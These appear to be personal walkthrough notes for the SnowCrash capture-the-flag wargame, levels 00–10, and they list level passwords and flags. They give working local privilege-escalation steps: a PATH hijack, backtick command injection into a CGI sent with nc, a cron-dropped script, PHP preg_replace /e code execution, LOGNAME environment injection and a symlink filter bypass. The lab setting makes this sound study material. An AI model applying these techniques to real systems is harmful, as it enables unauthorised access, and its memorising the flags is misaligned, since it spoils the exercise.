0 - Search for writable/readable files (find / -writable(-readable) -type d(f) 2>/dev/null)
1 - List users (cat /etc/passwd)
2 - Find target
3 - Get ids (id target)
4 - Find files from target (find -user flag00 -type f 2>/dev/null)
5 - Crach passwd file with john

method to search:
	grep -d recurse [SEARCH] . 2>/dev/null | cut -d":" -f 1 | sort | uniq
	find . -name "*[SEARCH]*"

method for executables:
	try it
	permissions
	strings
	ltrace


level00 -> level00
	find / -user flag00 2>/dev/null
	cat /usr/sbin/john
		search for "sbin john" -> john the ripper ?

	flag00 -> nottoohardhere (caesar +15)

level01 -> x24ti5gi3x0ol2eh4esiuxias
	scp passwd herrfalco@192.168.1.86:~/SnowCrash
	john passwd --show

	flag01 -> abcdefg

level02 -> f2av5il02puano7naaf6adaaf
	scp level02.pcap herrfalco@192.168.1.86:~/SnowCrash
	tcpick -C -yP -r level02.pcap

	flag02 -> ft_waNDReL0L (zero inside)

level03 -> kooda2puivaav1idi4f57q8iq
	try level03
	permissions s created by flag03
	ltrace level03 -> permissions -> echo substitute to getflag
	find . -writable -type d 2>/dev/null
	export PATH=/tmp:$PATH
	vim echo -> "#!/bin/bash
		getflag"
	chmod 777 echo
	scp -P 4242 echo level03@192.168.1.25:/tmp
	
	flag03 -> X

level04 -> qi0maab88jeaj46qoumi7maus
	permissions s created by flag04
	cat level04.pl -> CGI -> Server ?
	search in /etc find apache2
	cat /etc/apache2/sites-enabled -> :4747
	>
	"DocumentRoot    /var/www/level04/"
	SuexecUserGroup flag04 level04
	DirectoryIndex level04.pl
	<
	create cgi_request :
	>
	GET /?x=`getflag` HTTP/1.1
	Host: nobody
	
	<
	nc 192.168.1.25 4747 < cgi_request

	flag04 -> X

level05 -> ne2searoevaevoem4ov4ar8ap
	new mail ?
	find / -name mail 2>/dev/null
	cat /var/mail/level05
	>
	*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
	<
	cat /usr/sbin/openarenaserver
	create cront_tab
	>
	getflag > /tmp/result
	<
	scp -P 4242 ./cron_tab level05@192.168.1.25:/opt/openarenaserver/
	chmod 777 cron_tab
	wait until it disapear
	cat /tmp/result

	flag05 -> X

level06 -> viuaaale9huek52boumoomioc
	$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
	/e -> exploit
	create file
	>
	[x {${exec(getflag)}}]
	<
	scp -P 4242 ./php_cmd level06@192.168.1.25:/tmp/php_cmd
	./level06 /tmp/php_cmd

	flag06 -> X

level07 -> wiok45aaoguiboiki2tuin6ub
	permissions s
	run with ltrace
	>
	getenv("LOGNAME") = "level07"
	asprintf(0xbffff744, 0x8048688, 0xbfffff48, 0xb7e5ee55, 0xb7fed280) = 18
	system("/bin/echo level07 ")
	<
	export LOGNAME="; getflag;"
	run

	flag07 -> X

level08 -> fiumuikeil55xe9cu4dood66h
	permissions s
	run -> file to read
	echo bonjour > /tmp/bonjour; ./level08 /tmp/bonjour
	ltrace ./level08 /tmp/bonjour
	ltrace ./level08 token
	-> filter by name with strstr
	ln -s ~/token /tmp/boken
	./level08 /tmp/boken

	flag08 -> quif5eloekouj29ke0vouxean

level09 -> 25749xKZ8L7DkSCwJkT9dyv6f
	run with "aaaaaaaaaa" argument
	-> abcdefghij
	cat token -> code to decode
	create decoder.c
	>
	int main(void) {
		int i = 0;
		char c = 0;

		for (i = 0; read(0, &c, 1) > 0; ++i) {
			printf("%c", c - i);
		}
		printf("\n");
		return (0);
	}
	<
	scp -P 4242 decoder.c level09@192.168.1.16:/tmp
	gcc -Wall -Wextra /tmp/decoder.c -o /tmp/decoder
	cat /home/user/level09 | /tmp/decoder
	
	flag09 -> f3iji1ju5yuevaus41q1afiuq

level10 -> s5cAJpM8ev6XHw998pRWG728z

	in gdb
	break system
	x/1s 0x080485e0
mkisofs -o SnowCrash_mod.iso -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -J -R -V "Custom SnowCrash Iso" ../SnowCrash
